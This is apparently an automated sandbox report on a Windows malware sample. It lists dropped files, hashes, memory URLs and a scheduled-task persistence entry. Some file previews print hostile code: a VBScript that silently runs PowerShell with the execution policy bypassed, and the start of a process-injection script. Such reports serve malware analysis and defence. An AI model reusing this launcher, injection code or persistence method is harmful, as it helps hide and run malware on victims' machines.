                      SourceDetectionScannerLabelLink
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://android.notify.windows.com/iOS0%URL Reputationsafe
                      https://powerpoint.office.comcember0%URL Reputationsafe
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                      https://api.msn.com/0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      https://excel.office.com0%URL Reputationsafe
                      http://schemas.micro0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://crl.v0%URL Reputationsafe
                      https://outlook.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://word.office.comonexplorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000002.3348603804.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2174037688.000000000C84A000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://android.notify.windows.com/iOSexplorer.exe, 0000000B.00000002.3340185941.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096799118.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://powerpoint.office.comcemberexplorer.exe, 0000000B.00000000.2172780647.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3347671584.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 0000000B.00000002.3347671584.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2172780647.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3097166217.000000000C50F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.msn.com/explorer.exe, 0000000B.00000002.3343227530.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://excel.office.comexplorer.exe, 0000000B.00000002.3343227530.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096126515.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.microexplorer.exe, 0000000B.00000002.3342474337.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165194690.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165708418.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.vexplorer.exe, 0000000B.00000002.3335335583.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://outlook.comexplorer.exe, 0000000B.00000003.3094867488.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009D42000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://wns.windows.com/)sexplorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                No contacted IP infos

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543709
                                Start date and time:2024-10-28 09:44:10 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 14s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:18
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                Detection:MAL
                                Classification:mal100.expl.evad.mine.winEXE@18/26@0/0
                                EGA Information:Failed
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                • Execution Graph export aborted for target SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe, PID 3500 because there are no executed function
                                • Execution Graph export aborted for target explorer.exe, PID 1028 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtEnumerateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                04:45:09API Interceptor67x Sleep call for process: powershell.exe modified
                                04:45:22API Interceptor615x Sleep call for process: explorer.exe modified
                                04:45:29API Interceptor1x Sleep call for process: WerFault.exe modified
                                09:45:06Task SchedulerRun new task: Windows App Service path: wscript.exe s>"C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_e3e376607c938e89715eea1c279ea3dcb779c832_5e8777c1_815c6416-1c3f-4bf6-9db7-161d7dd68d33\Report.wer

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8484576755474721
                                Encrypted:false
                                SSDEEP:96:g5sFKMon1T9+I7swnN0Z7hfpQXIDcQBpc6BtScElcw3O/p+HbHg/EFA1HeaVDPOt:HXo77V0PpNtSfrj1KzuiFqZ24lO8B
                                MD5:F313326154D5DCD7A75C902331F5E039
                                SHA1:241EAF30D274B36F5715F28DD99B758EFB27F073
                                SHA-256:2E1DD9406A61B20375E25BCD6B72EFE00FB591352741D87E54A7C3F44A0B5C0D
                                SHA-512:93783FC9B5909092BDF0E1A19F997DC368019829A56172E145692F4F6F282530FB87CEC4A8F8D05EEBF9D9209624D6409C55D2A464497EF6F9E976DDD1C1FE9B
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.7.8.7.0.5.8.1.0.9.8.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.7.8.7.0.6.5.7.6.5.9.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.5.c.6.4.1.6.-.1.c.3.f.-.4.b.f.6.-.9.d.b.7.-.1.6.1.d.7.d.d.6.8.d.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.6.8.b.9.2.8.-.4.c.8.8.-.4.b.0.9.-.b.4.7.e.-.f.a.b.5.a.a.9.1.0.b.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.6.4...M.a.l.w.a.r.e.X.-.g.e.n...9.6.2.5...1.4.4.4.3...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.E.X.P.R.E.S.S...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.a.c.-.0.0.0.1.-.0.0.1.4.-.e.2.8.4.-.a.8.a.e.1.5.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.6.4.2.7.8.5.2.2.6.1.f.e.0.d.f.b.6.e.9.d.e.7.f.3.d.f.5.7.e.a.9.0.0.0.0.0.9.0.4.!.0.0.0.0.7.7.6.5.9.f.c.e.3.6.b.9.6.a.2.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2E4.tmp.dmp

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Mon Oct 28 08:45:06 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):63076
                                Entropy (8bit):1.7904871872581332
                                Encrypted:false
                                SSDEEP:192:m2znOsC+fHfdmCEdxhHcPS3M7ffJImys4Sm5/io7:NSv0cCIci7vs4S0l7
                                MD5:139AA7605E7D1C6DF5EA01A42EAA2443
                                SHA1:DA0796B2A5F6C289795D194A5D455066F152FCCD
                                SHA-256:53C76F52BEA2B18627A1BB79BD651DA5C66609A91DFFF7213C54A27F09FDEC2B
                                SHA-512:9B4818E5992285BD6FE0F6CB423ED9E5D86668941291A59971A0FAC027688B4ADF8AF0B02DEC41A3E6CEE07CBEE952A6000577FDE1819D4F85414CD43E2B9E6E
                                Malicious:false
                                Preview:MDMP..a..... ........O.g........................@...........<................-..........`.......8...........T...........................$...........................................................................................eJ..............Lw......................T............O.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB46B.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8880
                                Entropy (8bit):3.7044401159888856
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJAIi7L6YEIeym/nGgmfvpZtNWqpr+89biX8fn2m:R6lXJXGL6YEBymegmfvpZt7isf/
                                MD5:83ACDB0382C0CBB8CB5B72B8A9405FE5
                                SHA1:008243AA29781B2BDCF8AF948F557023DD04EECE
                                SHA-256:62451FFCC48E4D727FAA932AFD69671B6C0CF01DDE3582BEFBC521939ED09AB7
                                SHA-512:626756AE18BD2F0AFE3AA2D496EA6681F663F5D2502BBF4CB74AB0AD922A8DB780A8ACE96E996083A04DED6A3937993B2DBAD52C2A7AD1A79AFB0300F1017262
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.0.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB49B.tmp.xml

                                Download File
                                Process:C:\Windows\System32\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4884
                                Entropy (8bit):4.540620918849176
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsJJg771I9Z+VWpW8VYzYm8M4J5OotsFd+Dyq85dOTVkbbOE8O5d:uIjfbI7G+k7VTJwozkbyEX5d
                                MD5:FC369253B1C38823CA7F0A509F9D8FCF
                                SHA1:C0F91D71A00CF26B312437C94EECBCE61091D26F
                                SHA-256:D99618C52DD62E6F63AE8735A75A9C36323FE7A645A3B79A9BF0F0A6C3A54851
                                SHA-512:3572FC354F68E2C83B7A7355216258A1AF9B0A66D53668611541C285859C7C7A4E0322E1EAE285017CCAA6E910625062A2A405DB3D1F3E70AABB09010AACF4BD
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="563027" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.manifest

                                Download File
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7280976
                                Entropy (8bit):7.9999741461347025
                                Encrypted:true
                                SSDEEP:196608:zWEqkZFbTzTCqOTwlzhhR9OZxMER+jzLK:zWEnZFbeq0wlVj9OZFUfK
                                MD5:3808C579E366593A671F4A2F629AB2F1
                                SHA1:FB792FAA82FBD916AC23DA540AD1067DE670D038
                                SHA-256:4BC43C5DF2CA57FA50A683A062204D06F45D6DB15009B92A65BA63ED92E5A730
                                SHA-512:3620FF85DB249E23082324175A319CD1A3C44323B6B83E452D61B431AC31ADBE2CF9A05EA66BC8E8814C4639B0AC6EE6518FAEAA1AF7712C6E417B17492F7AEA
                                Malicious:false
                                Preview:Cz.2......._[m.4:.>C..5.\-.d.....ZE}.....!......:.z.s..*As$.......z$....)..w.8(.M.s.eDbY;..i...C........Vb..S..gx...1....\.Q..C...._a.....x...d..co..Z.G.7..-:f.X.'b.y..H.Bm\. ........$.9.~!.2..U.#.Y.!Hr+....B&c......d.u...zZQP..b6[.@....m....k\...^.......m....t.K..R...A.l.J....w..<.j...x.........K...r.T..n.PH..x....W.AcQ.......i....9.4D0.0....W-.....X...._....1.E.W...W.. }..z...v..Y...h.'.._$..L.F.#..X.Oo.........10.o6)...QJ*.n.L....E..+.:.......K%..|..bL..#H....W.^..._). .......2....5..../....;..v:...4..........]X.*#.x...A....=.(.<.v...R>..i.P..jC.=..IP..~...c..k.gy....4.F...,...G^..?....|\.!cTii^/.....A......1...;.v8v.C#....@B..[@(.........c_...j}#.42..8.J........f..6..f......CH..a.%.....c..%...<.5.P.Lk.|v....;K.'3...X2......}.`..u.n.Q......Tyw2..<.s.:A...b.Y... ..n..^..%.. .o.^ik&<I>`.....l.I_......l>.@B.).b@R...~&:.....Fp;".J.V.A8..71...<....{'yT!.{|s.{.[..h.`..........u..h..c...W..I....:5.#....I...k...o..$.H;...2v|.....@..

                                C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1

                                Download File
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4474
                                Entropy (8bit):5.040646731039938
                                Encrypted:false
                                SSDEEP:48:DtoCtK4uI5MTz7sUMfitmbouw9goxkbPzsU+GhJWpBEyl2zxUj9LceYvipcEou36:DtoOGSJ6UzsUlAb8tU1lfG3AcxsM
                                MD5:B899FE2143C074DCCC0EA0B837D6AC4A
                                SHA1:AE24D88A8EDD130C4AA095950CE48055A701BA40
                                SHA-256:BE1DAEBF8F0F0CE4CFBC2CBE13A087034741874F377F70E637D66017586CF338
                                SHA-512:3D2F56ACAC93DC5163A135FD9021F7D7B5A3AE3B566CB9C356CD4FAF95DEAD74933AA769AAF8065A170770CA3952AAF12CD4E3731775F53613C1F022FBCE04DD
                                Malicious:true
                                Preview:Add-Type @"..using System;..using System.Runtime.InteropServices;....public class WinAPI..{.. [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr OpenProcess(int processAccess, bool bInheritHandle, uint processId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, ref IntPtr lpThreadId);.... [DllImport("kernel32.dll", SetLastError = true)].. public static extern bool Clos

                                C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs

                                Download File
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):161
                                Entropy (8bit):4.928418334390396
                                Encrypted:false
                                SSDEEP:3:j+qAHmFEm8nhcDQBgSSJJLNy1oM3KbQqPJH0cVERSHZF3BsO+HHHHJvn:j+q9Nqhnsny1R3KbQO0cBB3+nh
                                MD5:4829A6EEA56ADF04A96476ECB75EF540
                                SHA1:189444FB7CC99A1322841D84CD42656F00552D7C
                                SHA-256:412521617535A8AF32B1A00364BB99A9B87E7AD9D5EB34EFAE03427BE1A7E60D
                                SHA-512:010A85584FE6CE005557DFF01A4DA96C0A02A4A4394F9102449E88425477ACC7BBBB1BDB3938077ADE02D0D04C43E89E1B7DF4DD15FFBE9FF1F52E52C6FD089A
                                Malicious:true
                                Preview:Set objShell = CreateObject("WScript.Shell")..objShell.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File """ & WScript.Arguments(0) & """", 0

                                C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll

                                Download File
                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):7888896
                                Entropy (8bit):7.974064364113542
                                Encrypted:false
                                SSDEEP:196608:iIwWEqkZFbTzTCqOTwlzhhR9OZxMER+jzL:iPWEnZFbeq0wlVj9OZFUf
                                MD5:9318C82DAD52D0591436302A1DB63173
                                SHA1:8748191262F5873EA43E1E995D047FAF11C8CF04
                                SHA-256:ACAA7F2A46CB1B171B4E723360FFDD9ACF3DBEFD23C1C20D6EADB6DFC96974C5
                                SHA-512:DD083628F8322862D20E1AD13FFD72588344D9C62C8EAD80F6167C20EB3E6E6E220B37DEDF6D195EFD4434A969C9EAAA8854A89FADCB7FC32A9BD7AF297EE738
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 50%
                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......&.@.b...b...b...).+....).-.i.....-.j...).(.c.....*.A...)./.i...b./.......+.[...).*.v.....'.`.......c.......c...b...c.....,.c...Richb...........................PE..d...L..g.........." ..........r...............................................x...........`.............................................L......d.......p.p.....d>............x.X...@...p.......................(....................................................text............................... ..`.rdata...".......$..................@..@.data....:......."..................@....pdata..d>.......@..................@..@.gfids.......P......................@..@.tls.........`......................@....gxfg....$...p...&..................@..@.gehcont ............B..............@..@.rsrc...p.p.......p..D..............@..@.reloc..X.....x......Nx.............@..B................................................

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1510207563435464
                                Encrypted:false
                                SSDEEP:3:Nlllul9kLZ:NllUG
                                MD5:087D847469EB88D02E57100D76A2E8E4
                                SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                Malicious:false
                                Preview:@...e.................................,..............@..........

                                C:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.0910044856711916
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRXYak7YnqqQXNPN5Dlq5J:+RI+ycuZhNMakS4PNnqX
                                MD5:143815E814959CAA3632D7FCBF624056
                                SHA1:1668646495C11BE7A3B7BDFC32C3D26CEFAD44CA
                                SHA-256:D19D1C4B3576C2E827B7EC4FBB6A44EC54855419BF85F69EFA2EC41DB2062E66
                                SHA-512:041F871F45CC023AC7A40DE8A2F44AED57AE302FF5E02B0021083747013B4392166ABDD09B6E394F05BA32A4ABABAC07802B7930E6DD38DD284BF9F95F7BA37C
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.p.o.x.i.y.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.p.o.x.i.y.r.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                C:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.125443491624306
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNDGak7YnqqmDXPN5Dlq5J:+RI+ycuZhNqakSSPNnqX
                                MD5:31CE6B0F0E2ADCBE90CB9660F187CCE3
                                SHA1:3AE51313466F7E384BA8E8748C842F7C3DFD9454
                                SHA-256:8AC8701F89365986192D758BBCF8EBBBB6E5BAD20CF0CED55BCFBADAA563C75D
                                SHA-512:5664186F29C2D55113A3F9CCD43BB77F94F0434DC57B121D1BE9C6A4BDBA196BD360368F14C65A74F17B85F1A0F1929B3AF0406D31FD9A4AACDD4AB039491629
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.c.z.y.5.v.w.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...i.c.z.y.5.v.w.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                C:\Users\user\AppData\Local\Temp\RESC35E.tmp

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Mon Oct 28 10:44:48 2024, 1st section name ".debug$S"
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):3.987316266546504
                                Encrypted:false
                                SSDEEP:24:H1nW9Qju6UuHRwKdNII+ycuZhNqakSSPNnqShgd:x5ju6UuaKdu1ulqa3+qSy
                                MD5:14B73DAE93DAE85B41DBC22FD62E4F7E
                                SHA1:AB0467095E113FF317D43F4BD5C970123467FA98
                                SHA-256:E79CBD095FC6063A3831AC06A3D2F1C8B1570351B271B783E0208EF519725FA2
                                SHA-512:6C98C8AE57E3E40F1571C5291919CA3EB8F69407A5B3920FD8D57F06C405751B866A0E80CC3CBE4A757B23E4EB32747FEAB735D985EEF42C1B177952B22D3391
                                Malicious:false
